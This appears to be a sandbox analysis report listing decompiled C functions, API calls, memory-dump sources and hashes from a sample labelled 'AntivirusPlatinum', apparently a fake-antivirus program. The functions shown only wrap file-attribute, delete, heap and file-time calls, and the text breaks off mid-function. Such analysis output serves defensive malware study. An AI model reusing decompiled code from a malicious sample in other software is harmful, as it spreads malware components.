                                                                                                                                                              						goto L4;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t6 = GetFileAttributesW(_t8);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return 0 | _t6 != 0xffffffff;
                                                                                                                                                              			}





                                                                                                                                                              0x0040576e
                                                                                                                                                              0x00405787
                                                                                                                                                              0x0040578b
                                                                                                                                                              0x00405770
                                                                                                                                                              0x00405770
                                                                                                                                                              0x00405776
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040577e
                                                                                                                                                              0x0040577f
                                                                                                                                                              0x0040577f
                                                                                                                                                              0x00405776
                                                                                                                                                              0x0040579b

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                              • GetFileAttributesW.KERNEL32(?,00404D18,00000045,?,?,?,?), ref: 0040577F
                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,00404D18,00000045,?,?,?,?), ref: 0040578B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile$Version
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3849939888-0
                                                                                                                                                              • Opcode ID: 524b25f258809a36dfc35c36927b002a5b6a96657706656b02a112759786d9b7
                                                                                                                                                              • Instruction ID: 7e3c92b8c8380a4f5cb43efcc2c9e82e3b9f6ddc0792d840e2a2494f752396e4
                                                                                                                                                              • Opcode Fuzzy Hash: 524b25f258809a36dfc35c36927b002a5b6a96657706656b02a112759786d9b7
                                                                                                                                                              • Instruction Fuzzy Hash: 81D01234100601DBDB185B35CE8456F77A5EB01350F25853AA893E71E0D779CCA0FE29
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004057E8(void* __eflags, CHAR* _a4, WCHAR* _a8, long _a12) {
                                                                                                                                                              				signed int _t8;
                                                                                                                                                              				WCHAR* _t10;
                                                                                                                                                              
                                                                                                                                                              				if(E00406EA5() == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					_t8 = SetFileAttributesA(_a4, _a12); // executed
                                                                                                                                                              				} else {
                                                                                                                                                              					_t10 = _a8;
                                                                                                                                                              					if(_t10 == 0 ||  *_t10 == 0) {
                                                                                                                                                              						goto L4;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t8 = SetFileAttributesW(_t10, _a12);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t8 & 0xffffff00 | _t8 != 0x00000000;
                                                                                                                                                              			}





                                                                                                                                                              0x004057ef
                                                                                                                                                              0x0040580c
                                                                                                                                                              0x00405814
                                                                                                                                                              0x004057f1
                                                                                                                                                              0x004057f1
                                                                                                                                                              0x004057f7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004057ff
                                                                                                                                                              0x00405804
                                                                                                                                                              0x00405804
                                                                                                                                                              0x004057f7
                                                                                                                                                              0x0040581f

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                              • SetFileAttributesW.KERNEL32(00000000,00000400,004058DE,00000000,00000400,00000000,?,004059B4,00000400,00000002,00000001,00000000), ref: 00405804
                                                                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,00000400,004058DE,00000000,00000400,00000000,?,004059B4,00000400,00000002,00000001,00000000), ref: 00405814
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AttributesFile$Version
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3849939888-0
                                                                                                                                                              • Opcode ID: 12ca7f4e58392410de16856001fcee0e91b4b1d1f28ffb7e50594ca5539bfda5
                                                                                                                                                              • Instruction ID: 08685831cb82508d6e727d5ab8162a25905bf89111ec148f976887a7ede13977
                                                                                                                                                              • Opcode Fuzzy Hash: 12ca7f4e58392410de16856001fcee0e91b4b1d1f28ffb7e50594ca5539bfda5
                                                                                                                                                              • Instruction Fuzzy Hash: 1EE0EC36204601EADB556F21DE04A1FBBAAEF80350F04C43AB985E51F0D778CC70DB29
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405866(void* __eflags, CHAR* _a4, WCHAR* _a8) {
                                                                                                                                                              				signed int _t6;
                                                                                                                                                              				WCHAR* _t8;
                                                                                                                                                              
                                                                                                                                                              				if(E00406EA5() == 0) {
                                                                                                                                                              					L4:
                                                                                                                                                              					_t6 = DeleteFileA(_a4); // executed
                                                                                                                                                              				} else {
                                                                                                                                                              					_t8 = _a8;
                                                                                                                                                              					if(_t8 == 0 ||  *_t8 == 0) {
                                                                                                                                                              						goto L4;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t6 = DeleteFileW(_t8);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t6 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                              			}





                                                                                                                                                              0x0040586d
                                                                                                                                                              0x00405886
                                                                                                                                                              0x0040588a
                                                                                                                                                              0x0040586f
                                                                                                                                                              0x0040586f
                                                                                                                                                              0x00405875
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040587d
                                                                                                                                                              0x0040587e
                                                                                                                                                              0x0040587e
                                                                                                                                                              0x00405875
                                                                                                                                                              0x00405895

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                              • DeleteFileW.KERNEL32(?,00404FDA,-00000017,00000418,00000000,004054A2,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E), ref: 0040587E
                                                                                                                                                              • DeleteFileA.KERNELBASE(00000000,00404FDA,-00000017,00000418,00000000,004054A2,?,?,?,004032B2,?,00414C7C,0040339B,00000002,?,0040501E), ref: 0040588A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DeleteFile$Version
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3886669992-0
                                                                                                                                                              • Opcode ID: cf6deccc3a9250c3054f7bca4c62ca8db216f1a25379af536149a02a497da06f
                                                                                                                                                              • Instruction ID: 716b7f0cb8a833341a7e27b2f494167b72d8bdc84a5c6d0c38cb64946278def0
                                                                                                                                                              • Opcode Fuzzy Hash: cf6deccc3a9250c3054f7bca4c62ca8db216f1a25379af536149a02a497da06f
                                                                                                                                                              • Instruction Fuzzy Hash: 8FD012315046019AD7147B22CE48A2B37A4EB50380B08C0366C05E11E0E778C870DA19
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040A205(void* _a4) {
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				char _t5;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                              					_t5 = RtlFreeHeap(GetProcessHeap(), 0, _a4); // executed
                                                                                                                                                              					return _t5;
                                                                                                                                                              				}
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}





                                                                                                                                                              0x0040a20c
                                                                                                                                                              0x0040a21a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040a21a
                                                                                                                                                              0x0040a221

                                                                                                                                                              APIs
                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A213
                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,?,0040DBDA,00000000,00000000,00402BAB,?,00000000,00402C91), ref: 0040A21A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$FreeProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3859560861-0
                                                                                                                                                              • Opcode ID: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                              • Instruction ID: ddbe3d2fe61905f89b57794dcc6228a96356cb271f48638cc85bb0a9df389cd0
                                                                                                                                                              • Opcode Fuzzy Hash: 1b78dc34d96e9a725593af20b36eac71c5368e07aec29259156ac954563b159f
                                                                                                                                                              • Instruction Fuzzy Hash: 62C01236004208ABCB101B90EA0CBDA3E69EB08302F008031B708841A0C6B596B0CBAE
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040307F(struct HWND__* _a4, int _a8, signed char _a12) {
                                                                                                                                                              				int _t6;
                                                                                                                                                              
                                                                                                                                                              				_t6 = EnableWindow(GetDlgItem(_a4, _a8), _a12 & 0x000000ff); // executed
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}




                                                                                                                                                              0x00403094
                                                                                                                                                              0x0040309a

                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32 ref: 0040308D
                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00403094
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CallbackDispatcherItemUser
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4250310104-0
                                                                                                                                                              • Opcode ID: 53d7fe0b17c9d7c83ce2a09200998b9300a9737409a95869f191deb72e36b247
                                                                                                                                                              • Instruction ID: a5b1e21e8c70e636ad4e3161602f3880b2a1687c4984bed245f76023c7c7062a
                                                                                                                                                              • Opcode Fuzzy Hash: 53d7fe0b17c9d7c83ce2a09200998b9300a9737409a95869f191deb72e36b247
                                                                                                                                                              • Instruction Fuzzy Hash: D1C04C76408241BFCB015BA09E08DAFBFA9EBD4311F00C959B1A5C0030C7B58461DB16
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                              			E0040B613(void* __edi, void* __esi, intOrPtr* _a4, CHAR* _a8, char* _a12, char* _a16, char* _a20) {
                                                                                                                                                              				char _v4100;
                                                                                                                                                              				char* _t29;
                                                                                                                                                              				intOrPtr* _t30;
                                                                                                                                                              				char _t32;
                                                                                                                                                              				char* _t34;
                                                                                                                                                              				char* _t45;
                                                                                                                                                              				char* _t47;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				void* _t50;
                                                                                                                                                              				void* _t51;
                                                                                                                                                              				CHAR* _t52;
                                                                                                                                                              
                                                                                                                                                              				_t51 = __esi;
                                                                                                                                                              				_t50 = __edi;
                                                                                                                                                              				E00401200(0x1000);
                                                                                                                                                              				_t29 = _a16;
                                                                                                                                                              				_t47 = _a20;
                                                                                                                                                              				if(_t29 != 0) {
                                                                                                                                                              					 *_t29 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				if(_t47 != 0) {
                                                                                                                                                              					 *_t47 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				_t30 = _a4;
                                                                                                                                                              				if(_t30 == 0) {
                                                                                                                                                              					L24:
                                                                                                                                                              					return 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t32 =  *_t30;
                                                                                                                                                              					if(_t32 == 0) {
                                                                                                                                                              						goto L24;
                                                                                                                                                              					}
                                                                                                                                                              					_push(_t51);
                                                                                                                                                              					_t52 = 0;
                                                                                                                                                              					_t48 = 0;
                                                                                                                                                              					do {
                                                                                                                                                              						_a4 = _a4 + 1;
                                                                                                                                                              						if(_t32 != 0x3d) {
                                                                                                                                                              							if(_t32 == 0xd) {
                                                                                                                                                              								_a4 = _a4 + 1;
                                                                                                                                                              								L20:
                                                                                                                                                              								 *_a8 = 0;
                                                                                                                                                              								_t34 = _a12;
                                                                                                                                                              								if(_t34 != 0) {
                                                                                                                                                              									 *_t34 = 0;
                                                                                                                                                              									if(_t52 != 0) {
                                                                                                                                                              										ExpandEnvironmentStringsA(_t52,  &_v4100, 0x1000);
                                                                                                                                                              										_t20 = _t50 - 1; // 0xfff
                                                                                                                                                              										E0040A4AB(_a12,  &_v4100, _t20);
                                                                                                                                                              										 *((char*)(_a12 + _t50 - 1)) = 0;
                                                                                                                                                              										 *_t52 = 0;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								return _a4;
                                                                                                                                                              							}
                                                                                                                                                              							if(_t32 == 0xa) {
                                                                                                                                                              								goto L20;
                                                                                                                                                              							}
                                                                                                                                                              							L15:
                                                                                                                                                              							_a8 =  &(_a8[1]);
                                                                                                                                                              							 *_a8 = _t32;
                                                                                                                                                              							_t12 = _t50 - 2; // 0xffe
                                                                                                                                                              							if(_t48 > _t12) {
                                                                                                                                                              								 *_a20 = 1;
                                                                                                                                                              								goto L20;
                                                                                                                                                              							}
                                                                                                                                                              							goto L16;
                                                                                                                                                              						}
                                                                                                                                                              						if(_a12 == 0 || _t52 != 0) {
                                                                                                                                                              							goto L15;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t45 = _a16;
                                                                                                                                                              							if(_t45 != 0) {
                                                                                                                                                              								 *_t45 = 1;
                                                                                                                                                              							}
                                                                                                                                                              							_t52 = _a8;
                                                                                                                                                              						}
                                                                                                                                                              						L16:
                                                                                                                                                              						_t32 =  *_a4;
                                                                                                                                                              						_t48 = _t48 + 1;
                                                                                                                                                              					} while (_t32 != 0);
                                                                                                                                                              					goto L20;
                                                                                                                                                              				}
                                                                                                                                                              			}














                                                                                                                                                              0x0040b613
                                                                                                                                                              0x0040b613
                                                                                                                                                              0x0040b61b
                                                                                                                                                              0x0040b620
                                                                                                                                                              0x0040b623
                                                                                                                                                              0x0040b62b
                                                                                                                                                              0x0040b62d
                                                                                                                                                              0x0040b62d
                                                                                                                                                              0x0040b631
                                                                                                                                                              0x0040b633
                                                                                                                                                              0x0040b633
                                                                                                                                                              0x0040b635
                                                                                                                                                              0x0040b63a
                                                                                                                                                              0x0040b6e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b640
                                                                                                                                                              0x0040b640
                                                                                                                                                              0x0040b644
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b64a
                                                                                                                                                              0x0040b64b
                                                                                                                                                              0x0040b64d
                                                                                                                                                              0x0040b64f
                                                                                                                                                              0x0040b64f
                                                                                                                                                              0x0040b654
                                                                                                                                                              0x0040b670
                                                                                                                                                              0x0040b699
                                                                                                                                                              0x0040b69c
                                                                                                                                                              0x0040b69f
                                                                                                                                                              0x0040b6a1
                                                                                                                                                              0x0040b6a6
                                                                                                                                                              0x0040b6a8
                                                                                                                                                              0x0040b6ac
                                                                                                                                                              0x0040b6bb
                                                                                                                                                              0x0040b6c1
                                                                                                                                                              0x0040b6cf
                                                                                                                                                              0x0040b6d7
                                                                                                                                                              0x0040b6db
                                                                                                                                                              0x0040b6db
                                                                                                                                                              0x0040b6ac
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b6e0
                                                                                                                                                              0x0040b674
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b676
                                                                                                                                                              0x0040b679
                                                                                                                                                              0x0040b67c
                                                                                                                                                              0x0040b67e
                                                                                                                                                              0x0040b683
                                                                                                                                                              0x0040b694
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b694
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b683
                                                                                                                                                              0x0040b659
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b65f
                                                                                                                                                              0x0040b65f
                                                                                                                                                              0x0040b664
                                                                                                                                                              0x0040b666
                                                                                                                                                              0x0040b666
                                                                                                                                                              0x0040b669
                                                                                                                                                              0x0040b669
                                                                                                                                                              0x0040b685
                                                                                                                                                              0x0040b688
                                                                                                                                                              0x0040b68a
                                                                                                                                                              0x0040b68b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040b68f

                                                                                                                                                              APIs
                                                                                                                                                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFD4,00000000,?,?,?,?,?,?,0040D24D,?), ref: 0040B6BB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: EnvironmentExpandStrings
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 237503144-0
                                                                                                                                                              • Opcode ID: 5fae4e63873776018887329e3184201ecfcb9ea2296943329708b5b4d23760c0
                                                                                                                                                              • Instruction ID: 9e38d73e54712bb0db1db56ca4312cf1ed03176aaf8c23fdc66e675287b3661e
                                                                                                                                                              • Opcode Fuzzy Hash: 5fae4e63873776018887329e3184201ecfcb9ea2296943329708b5b4d23760c0
                                                                                                                                                              • Instruction Fuzzy Hash: 473175351441899FCB128E58C490AEE3BA4EB15340B444977F991AB391C37ADD85CBAF
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004053C5(intOrPtr __ecx, intOrPtr* _a4, signed char _a7, intOrPtr* _a8, signed char _a11, intOrPtr* _a12) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				void* _v16;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				void* _v32;
                                                                                                                                                              				int _t32;
                                                                                                                                                              				signed char _t40;
                                                                                                                                                              				intOrPtr* _t43;
                                                                                                                                                              				intOrPtr* _t50;
                                                                                                                                                              				intOrPtr* _t53;
                                                                                                                                                              
                                                                                                                                                              				_v8 = __ecx;
                                                                                                                                                              				_t43 = _a4;
                                                                                                                                                              				if(_t43 == 0) {
                                                                                                                                                              					L2:
                                                                                                                                                              					_a7 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_a7 = 1;
                                                                                                                                                              					if( *_t43 == 0) {
                                                                                                                                                              						goto L2;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t50 = _a8;
                                                                                                                                                              				if(_t50 == 0) {
                                                                                                                                                              					L5:
                                                                                                                                                              					_a11 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_a11 = 1;
                                                                                                                                                              					if( *_t50 == 0) {
                                                                                                                                                              						goto L5;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				_t53 = _a12;
                                                                                                                                                              				if(_t53 == 0 ||  *_t53 == 0) {
                                                                                                                                                              					_t40 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t40 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				if(_a7 != 0) {
                                                                                                                                                              					E0040DE21(_t43,  &_v16);
                                                                                                                                                              				}
                                                                                                                                                              				if(_a11 != 0) {
                                                                                                                                                              					E0040DE21(_t50,  &_v32);
                                                                                                                                                              				}
                                                                                                                                                              				if(_t40 != 0) {
                                                                                                                                                              					E0040DE21(_t53,  &_v24);
                                                                                                                                                              				}
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				_t32 = SetFileTime( *(_v8 + 4),  ~(_a11 & 0x000000ff) &  &_v32,  ~(_t40 & 0x000000ff) &  &_v24,  ~(_a7 & 0x000000ff) &  &_v16); // executed
                                                                                                                                                              				return _t32;
                                                                                                                                                              			}












                                                                                                                                                              0x004053cb
                                                                                                                                                              0x004053ce
                                                                                                                                                              0x004053d5
                                                                                                                                                              0x004053df
                                                                                                                                                              0x004053df
                                                                                                                                                              0x004053d7
                                                                                                                                                              0x004053d7
                                                                                                                                                              0x004053dd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004053dd
                                                                                                                                                              0x004053e5
                                                                                                                                                              0x004053ea
                                                                                                                                                              0x004053f4
                                                                                                                                                              0x004053f4
                                                                                                                                                              0x004053ec
                                                                                                                                                              0x004053ec
                                                                                                                                                              0x004053f2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004053f2
                                                                                                                                                              0x004053f7
                                                                                                                                                              0x004053fc
                                                                                                                                                              0x00405406
                                                                                                                                                              0x00405402
                                                                                                                                                              0x00405402
                                                                                                                                                              0x00405402
                                                                                                                                                              0x0040540b
                                                                                                                                                              0x00405411
                                                                                                                                                              0x00405411
                                                                                                                                                              0x0040541a
                                                                                                                                                              0x00405422
                                                                                                                                                              0x00405422
                                                                                                                                                              0x00405429
                                                                                                                                                              0x00405431
                                                                                                                                                              0x00405431
                                                                                                                                                              0x0040543c
                                                                                                                                                              0x00405449
                                                                                                                                                              0x00405457
                                                                                                                                                              0x00405465
                                                                                                                                                              0x0040546f

                                                                                                                                                              APIs
                                                                                                                                                              • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 00405465
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileTime
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1425588814-0
                                                                                                                                                              • Opcode ID: f642364af0ceb2b33661677e8241ac08709fb3ff7d374f00a5f292b6e7a13f2b
                                                                                                                                                              • Instruction ID: b7019616bdd90384b6d06fdeb4558485ba74c302507b6c1e4955c3b22ac41809
                                                                                                                                                              • Opcode Fuzzy Hash: f642364af0ceb2b33661677e8241ac08709fb3ff7d374f00a5f292b6e7a13f2b
                                                                                                                                                              • Instruction Fuzzy Hash: B4219231500599AECF11DFB8C841AFF77A8DB11341B18807BE856EB2C1E678DB44DB69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 88%
                                                                                                                                                              			E0040928C(signed int __eax, intOrPtr* __ecx, void* __edx, void* __esi) {
                                                                                                                                                              				void* __ebx;
                                                                                                                                                              				signed int _t63;
                                                                                                                                                              				void* _t65;
                                                                                                                                                              				CHAR* _t66;
                                                                                                                                                              				void* _t70;
                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                              				void* _t76;
                                                                                                                                                              				intOrPtr _t77;
                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                              				intOrPtr _t80;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				char _t95;
                                                                                                                                                              				intOrPtr _t104;
                                                                                                                                                              				void* _t110;
                                                                                                                                                              				char _t111;
                                                                                                                                                              				void* _t116;
                                                                                                                                                              				void* _t117;
                                                                                                                                                              				void* _t118;
                                                                                                                                                              				void* _t119;
                                                                                                                                                              				void* _t122;
                                                                                                                                                              				intOrPtr* _t125;
                                                                                                                                                              				signed int _t127;
                                                                                                                                                              
                                                                                                                                                              				_t110 = __edx;
                                                                                                                                                              				_t97 = __ecx;
                                                                                                                                                              				_t63 = __eax ^ _t127;
                                                                                                                                                              				if(_t63 >= 0) {
                                                                                                                                                              					 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                              					_push( *(_t127 + 8));
                                                                                                                                                              					_t125 = __ecx;
                                                                                                                                                              					_t65 = E0040A3AD();
                                                                                                                                                              					_t66 = _t127 - 0x40c;
                                                                                                                                                              					if(_t65 != 0) {
                                                                                                                                                              						L5:
                                                                                                                                                              						E0040A477(_t66,  *(_t127 + 8));
                                                                                                                                                              						E00404EC3(_t127 - 0x102c);
                                                                                                                                                              						_t70 = E00405097(_t127 - 0x102c, _t127 - 0x40c, 0, 1, 0); // executed
